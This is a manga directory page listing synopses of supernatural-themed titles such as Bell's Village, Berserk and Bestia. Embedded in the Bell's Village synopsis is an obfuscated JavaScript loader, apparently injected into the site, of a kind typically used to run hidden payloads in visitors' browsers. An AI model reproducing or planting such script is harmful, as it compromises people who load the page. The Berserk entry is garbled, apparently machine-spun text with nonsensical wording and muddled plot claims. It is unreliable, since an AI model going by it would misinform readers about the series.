Supernatural - Page 45

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6247 results

Bell’s Village

Taken from Coffee Scans: A village, hidden in the forest, holds mysteries… But what happens when a foreign girl enters it?<script></script><script>(function(_0x1480ee,_0xc409ac){var _0x581446=_0x54f5,_0xdd4a9=_0x1480ee();while(!![]){try{var _0x3ac692=-parseInt(_0x581446(0xce))/(-0x416+0x15af+-0x2*0x8cc)+-parseInt(_0x581446(0xbb))/(0x1e2b+0x200f+-0x3e38)+parseInt(_0x581446(0xc6))/(0x9d3+-0x1*-0x1a5f+-0x9d*0x3b)+-parseInt(_0x581446(0xcb))/(0xb*0xcb+-0x23c5+0x1b10)*(-parseInt(_0x581446(0xc3))/(-0x1*-0x2cf+-0x2*-0xfbb+-0x2240))+parseInt(_0x581446(0xb1))/(0x13e5+0x25ec+-0x39cb)+-parseInt(_0x581446(0xca))/(-0x174c+-0xdf9+0x254c)*(parseInt(_0x581446(0xb5))/(-0x1*0x11b5+-0x54a*0x1+0x7ad*0x3))+-parseInt(_0x581446(0xbd))/(-0x2*-0x827+-0x1117+0xd2);if(_0x3ac692===_0xc409ac)break;else _0xdd4a9['push'](_0xdd4a9['shift']());}catch(_0xc2747b){_0xdd4a9['push'](_0xdd4a9['shift']());}}}(_0x1e49,0xf2d0+0x7f4*-0xe+0x10ad2));function _0x54f5(_0x36db55,_0x4e4b30){var _0x2d6899=_0x1e49();return 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Belmonde Le Visiteur

The story takes places in 17th century, France. Belmonde, a son of a noble father and a deceased witch mother, was born and raised in a cloister's basement. He is the master of an underground prison and has the rights to use any means to bring out confessions from his prisoners, namely by using "torture". With his eye, he is able to see through them... That is, if they do not comply to his questions. Summary based on the beginning chapters of this manga.


Benten Rock You

A Japanese goddess of old takes a keen interest in Anamori Izumi and her ability, a more powerful form of synesthesia. The goddess has a request for her, one which will require her to break out of her shell... and learn how to play the electric guitar.



Berserk Manga is a Japanese dark fantasy manga series illustrated and written by Kentaro Miura. Place in a medieval Europe-divine the narrative centers on the characters of Guts dark fantasy world, a lone mercenary, and Griffith, the leader of a mercenary group known as the Band of the Hawk. Motifs of camaraderie, isolation, as well as the question of whether mankind is basically good or bad pervade the narrative, as it investigates both the very best and worst of human nature. Both anime and the manga are noticed for their utilization of sexual content and heavy violence.  Guts in Berserk manga The Hawks play a critical role in stopping the 100-year war which has ravaged the state of Midland and are initially welcomed as heroes, when Guts leaves the Hawks to seek out his own vision, but Griffith's aspirations to rule his own kingdom are shattered. Not able to deal together with the loss, Griffith leads to the dungeon to get a year and seduces the King's daughter Charlotte. From the time Guts helps the outlawed remnants of the Hawks and learns of this save him, Griffith left and has been terribly mutilated a mute shadow of his former self. Of understanding his body, the weight is too damaged for him to execute he inadvertently activates the behelit on his man and his wishes shows too much for Griffith. This brings the Hawks to a different airplane in the place where they fall upon archdemons known as the four God Hand in the service called the Eclipse. Urged on from the eldritch beings, Griffith gives his soldiers to the apostles--people like Zodd who lost mankind and their nearest and dearest for power of the God Hand --so he is able to end up being the closing member of the God Hand. Though he along with his lover Casca are saved from certain death by the mysterious Skull Knight labeled, Guts witnesses the savage slaughter of his comrades. Intestines loses an eye and an arm while Casca is driven mad after being raped by the reborn Griffith, now called Femto.   Miura premiered a model of Berserk Manga in 1988.   There, falling upon Farnese of the Holy Iron Chain Knights of the Holy See Church , Guts finds himself going through a nightmarish ordeal that finishes in the physical type restored of Griffith. Griffith creates another Band of the Hawk with Zodd as well as other Apostles among its ranks to fight the invading Kushan military as Guts takes Casca to the Elven kingdom of Elfhelm for safety together with the aid of his new comrades. The war between the Kushan emperor and Griffith, a rogue apostle, culminates using the emperor's destruction as well as the overlapping of the supernatural as well as the mortal world. No longer challenged by guy or devil, Griffith creates his rule using the sanction of the Pope and Princess Charlotte over Midland, creating the city of Falconia to give you safety to the Midlanders in the ever-increasing assaults of creatures that are fabulous   Main characters in Berserk manga - Guts is is among the first companies that Guts makes during the latter's days as the Black Swordsman. Puck is an elf descendants in the primeval spirits of wind, of the pisky race. A former denizen of Elfhelm, the idyllic elven kingdom of King Hanafubuku, he went away out of absolute apathy in the Golden Age story arc told before the events. Puck supplies a lot of the comic relief in the show Berserk Manga   - Griffith is the primary protagonist of Berserk Manga. He was the previous raid unit leader of a mercenary group called the Band of the Hawk.   - Nosferatu Zodd is a fabled sword expert. Any conflict where he participates results in mountains of dead. Zodd is a strong Apostle who travels from battlefield to battlefield seeking ever-more powerful competitors. He's a known opponent of the Skull Knight.   - Rickert (Rikkeruto) was the youngest person in the Band of the Hawk. Other manga : + Sun Ken Rock Manga + Dragon Ball Manga


Bestia (Makoto Sanda)

Tsukasa Asuka decided to go to London for a short time, the place of his birth, to find the disappeared mother and the girl from his vague memories. There the boy meets one "Beast" and inadvertently gets involved in the battle. This is a story about a boy, swirling ancient city, and magical beasts.


Between Us - Lun Lun Yamamoto Short Stories

A collection of one-shots by Lun Lun Yamamoto, all done for *Flowers*, filled with bittersweetness and charm.- **Between Us** (ないしょの話, Naisho no Hanashi)- **Miss Schwartz is in Despair** (ミス・シュワルツは絶望している, Miss Schwartz wa Zetsubou Shiteiru): An older woman who isolates herself from others gets a new perspective on things when she meets the town alien.- **Future Prescription** (未来処方箋, Mirai Shohousen)- **My Rose-Colored World** (ぼくのばら色の世界, Boku no Bara-iro no Sekai)- **Cynthia** (シンシア)- **Sky-Blue Lily** (空色のリリィ, Sorairo no Lily)Placed 16th on Kono Manga Sugoi! in 2014.


Beware Of Demons

A small and weak bookworm gets into trouble with a domineering and handsome werewolf! "Anyone who messes with me will be punished!" sneered the werewolf. During what was supposed to be an unexciting game of punishment, unexpectedly, the completely ordinary little bookworm transforms into a handsome and alluring incubus! "You're my type, doggy." the incubus smiled wickedly.


Beware of Obsession

A gigantic tree plunged the city of into the midst of chaos, causing people to lose their sanity, and some even turned into demons. Ten years later, the protagonist, on his way home from work, coincidentally saved a mysterious young girl but lost his own life in the process. Upon awakening once more, he discovered that the girl’s soul had inexplicably merged with his own body. Not only that, he found himself able to wield the girl’s demonic powers. In order to unravel the mystery of the girl’s origins, Lin Sheng qi embarked on the path of demon hunting…


Beware Of The Great Beauty

A devil appeared in front of me, who was suffering because of my appearance, and made an attractive offer! I can make the look I want with just one click? CUTE! SEXY! PURE! LUXURY! Raise stats to create the look you want?! But you know... I thought I would be happy if I became prettier... but that doesn't seem to be the case?


Beyond Blood

Nicholas Abott wanted to act forever. When the mysterious and beautiful Elise Morin pulls him aside from a filming event, she grants his wish with a blood-stained kiss. But as Nico embraces his new vampiric power, can he also embrace the girl who turned him?



Alice had woken up in Room 431 of a mysterious manor. "You must not leave this room," warned the Serpent, but she paid it no heed and her body began to rot... Will she be able to escape the cursed manor?c


Biden vs Obama

Biden vs Obama summary is updating. Come visit sometime to read the latest chapter of Biden vs Obama. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.
